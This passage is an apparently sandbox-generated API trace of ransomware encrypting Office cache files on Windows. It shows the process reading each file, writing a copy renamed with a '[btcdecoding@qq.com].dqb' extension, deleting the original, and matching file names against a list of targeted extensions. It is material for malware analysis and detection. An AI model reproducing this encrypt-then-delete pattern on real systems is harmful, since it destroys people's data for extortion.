liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.210] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.210] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.435] GetLastError () returned 0x0 [0035.435] ReadFile (in: hFile=0x19c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x978, lpOverlapped=0x0) returned 1 [0035.763] WriteFile (in: hFile=0x188, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x980, lpOverlapped=0x0) returned 1 [0035.764] ReadFile (in: hFile=0x19c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.764] WriteFile (in: hFile=0x188, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.764] SetEndOfFile (hFile=0x188) returned 1 [0035.764] CloseHandle (hObject=0x188) returned 1 [0035.765] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.765] SetEndOfFile (hFile=0x19c) returned 1 [0035.766] CloseHandle (hObject=0x19c) returned 1 [0035.766] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.766] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.766] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.766] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.766] lstrlenW (lpString=".doc") returned 4 [0035.766] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.766] lstrlenW (lpString=".docx") returned 5 [0035.767] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.767] lstrlenW (lpString=".pdf") returned 4 [0035.767] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.767] lstrlenW (lpString=".xls") returned 4 [0035.767] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.767] lstrlenW (lpString=".xlsx") returned 5 [0035.767] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.767] lstrlenW (lpString=".ppt") returned 4 [0035.767] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.767] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.767] lstrlenW (lpString=".zip") returned 4 [0035.767] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.767] lstrlenW (lpString=".rar") returned 4 [0035.767] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.767] lstrlenW (lpString=".bz2") returned 4 [0035.767] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.767] lstrlenW (lpString=".7z") returned 3 [0035.767] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.767] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.767] lstrlenW (lpString=".dbf") returned 4 [0035.767] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.767] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.767] lstrlenW (lpString=".1cd") returned 4 [0035.767] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.767] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.767] lstrlenW (lpString=".jpg") returned 4 [0035.767] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.767] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.767] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.767] lstrlenW (lpString=".doc") returned 4 [0035.767] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.767] lstrlenW (lpString=".docx") returned 5 [0035.767] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.767] lstrlenW (lpString=".pdf") returned 4 [0035.767] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.768] lstrlenW (lpString=".xls") returned 4 [0035.768] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.768] lstrlenW (lpString=".xlsx") returned 5 [0035.768] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.768] lstrlenW (lpString=".ppt") returned 4 [0035.768] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.768] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.768] lstrlenW (lpString=".zip") returned 4 [0035.768] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.768] lstrlenW (lpString=".rar") returned 4 [0035.768] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.768] lstrlenW (lpString=".bz2") returned 4 [0035.768] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.768] lstrlenW (lpString=".7z") returned 3 [0035.768] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.768] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.768] lstrlenW (lpString=".dbf") returned 4 [0035.768] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.768] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.768] lstrlenW (lpString=".1cd") returned 4 [0035.768] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.768] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.768] lstrlenW (lpString=".jpg") returned 4 [0035.768] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.768] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0035.768] lstrlenW (lpString="AccessMUISet.xml") returned 16 [0035.768] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.769] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=819) returned 1 [0035.769] CloseHandle (hObject=0x19c) returned 1 [0035.769] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml")) returned 0x2020 [0035.769] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0035.769] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.769] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.769] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.769] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.769] GetLastError () returned 0x0 [0035.769] ReadFile (in: hFile=0x19c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x333, lpOverlapped=0x0) returned 1 [0035.901] WriteFile (in: hFile=0x188, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x340, lpOverlapped=0x0) returned 1 [0035.902] ReadFile (in: hFile=0x19c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.902] WriteFile (in: hFile=0x188, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0035.902] SetEndOfFile (hFile=0x188) returned 1 [0035.903] CloseHandle (hObject=0x188) returned 1 [0035.904] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.904] SetEndOfFile (hFile=0x19c) returned 1 [0035.905] CloseHandle (hObject=0x19c) returned 1 [0035.905] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.905] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml")) returned 1 [0035.905] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.905] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.906] lstrlenW (lpString=".doc") returned 4 [0035.906] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.906] lstrlenW (lpString=".docx") returned 5 [0035.906] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0035.906] lstrlenW (lpString=".pdf") returned 4 [0035.906] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.906] lstrlenW (lpString=".xls") returned 4 [0035.906] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.906] lstrlenW (lpString=".xlsx") returned 5 [0035.906] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0035.906] lstrlenW (lpString=".ppt") returned 4 [0035.906] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.906] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.906] lstrlenW (lpString=".zip") returned 4 [0035.906] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.906] lstrlenW (lpString=".rar") returned 4 [0035.906] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.906] lstrlenW (lpString=".bz2") returned 4 [0035.906] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.906] lstrlenW (lpString=".7z") returned 3 [0035.906] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.906] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.906] lstrlenW (lpString=".dbf") returned 4 [0035.906] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.906] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.906] lstrlenW (lpString=".1cd") returned 4 [0035.906] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.906] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.906] lstrlenW (lpString=".jpg") returned 4 [0035.906] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.906] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.906] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.906] lstrlenW (lpString=".doc") returned 4 [0035.906] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.907] lstrlenW (lpString=".docx") returned 5 [0035.907] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0035.907] lstrlenW (lpString=".pdf") returned 4 [0035.907] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.907] lstrlenW (lpString=".xls") returned 4 [0035.907] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.907] lstrlenW (lpString=".xlsx") returned 5 [0035.907] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0035.907] lstrlenW (lpString=".ppt") returned 4 [0035.907] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.907] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.907] lstrlenW (lpString=".zip") returned 4 [0035.907] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.907] lstrlenW (lpString=".rar") returned 4 [0035.907] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.907] lstrlenW (lpString=".bz2") returned 4 [0035.907] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.907] lstrlenW (lpString=".7z") returned 3 [0035.907] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.907] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.907] lstrlenW (lpString=".dbf") returned 4 [0035.907] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.907] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.907] lstrlenW (lpString=".1cd") returned 4 [0035.907] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.907] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0035.907] lstrlenW (lpString=".jpg") returned 4 [0035.907] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.907] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0035.907] lstrlenW (lpString="ProPlusrWW.xml") returned 14 [0035.907] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0036.169] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=16852) returned 1 [0036.169] CloseHandle (hObject=0x1a4) returned 1 [0036.169] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml")) returned 0x2020 [0036.169] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0036.169] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0036.169] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.169] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.169] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.170] GetLastError () returned 0x0 [0036.170] ReadFile (in: hFile=0x1a4, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x41d4, lpOverlapped=0x0) returned 1 [0036.173] WriteFile (in: hFile=0x180, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x41e0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x41e0, lpOverlapped=0x0) returned 1 [0036.174] ReadFile (in: hFile=0x1a4, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.174] WriteFile (in: hFile=0x180, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0036.174] SetEndOfFile (hFile=0x180) returned 1 [0036.174] CloseHandle (hObject=0x180) returned 1 [0036.175] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.175] SetEndOfFile (hFile=0x1a4) returned 1 [0036.176] CloseHandle (hObject=0x1a4) returned 1 [0036.176] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0036.177] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml")) returned 1 [0036.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.177] lstrlenW (lpString=".doc") returned 4 [0036.177] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.177] lstrlenW (lpString=".docx") returned 5 [0036.177] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0036.177] lstrlenW (lpString=".pdf") returned 4 [0036.177] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.177] lstrlenW (lpString=".xls") returned 4 [0036.177] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.177] lstrlenW (lpString=".xlsx") returned 5 [0036.177] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0036.177] lstrlenW (lpString=".ppt") returned 4 [0036.177] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.177] lstrlenW (lpString=".zip") returned 4 [0036.177] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.177] lstrlenW (lpString=".rar") returned 4 [0036.177] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.177] lstrlenW (lpString=".bz2") returned 4 [0036.177] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.177] lstrlenW (lpString=".7z") returned 3 [0036.177] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.177] lstrlenW (lpString=".dbf") returned 4 [0036.177] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.178] lstrlenW (lpString=".1cd") returned 4 [0036.178] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.178] lstrlenW (lpString=".jpg") returned 4 [0036.178] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.178] lstrlenW (lpString=".doc") returned 4 [0036.178] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.178] lstrlenW (lpString=".docx") returned 5 [0036.178] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0036.178] lstrlenW (lpString=".pdf") returned 4 [0036.178] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.178] lstrlenW (lpString=".xls") returned 4 [0036.178] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.178] lstrlenW (lpString=".xlsx") returned 5 [0036.178] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0036.178] lstrlenW (lpString=".ppt") returned 4 [0036.178] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.178] lstrlenW (lpString=".zip") returned 4 [0036.178] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.178] lstrlenW (lpString=".rar") returned 4 [0036.178] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.178] lstrlenW (lpString=".bz2") returned 4 [0036.178] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.178] lstrlenW (lpString=".7z") returned 3 [0036.178] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.178] lstrlenW (lpString=".dbf") returned 4 [0036.178] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.178] lstrlenW (lpString=".1cd") returned 4 [0036.178] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.178] lstrlenW (lpString=".jpg") returned 4 [0036.178] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.179] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0036.179] lstrlenW (lpString="Setup.xml") returned 9 [0036.179] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0036.179] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=20577) returned 1 [0036.179] CloseHandle (hObject=0x1a4) returned 1 [0036.179] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0036.179] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) 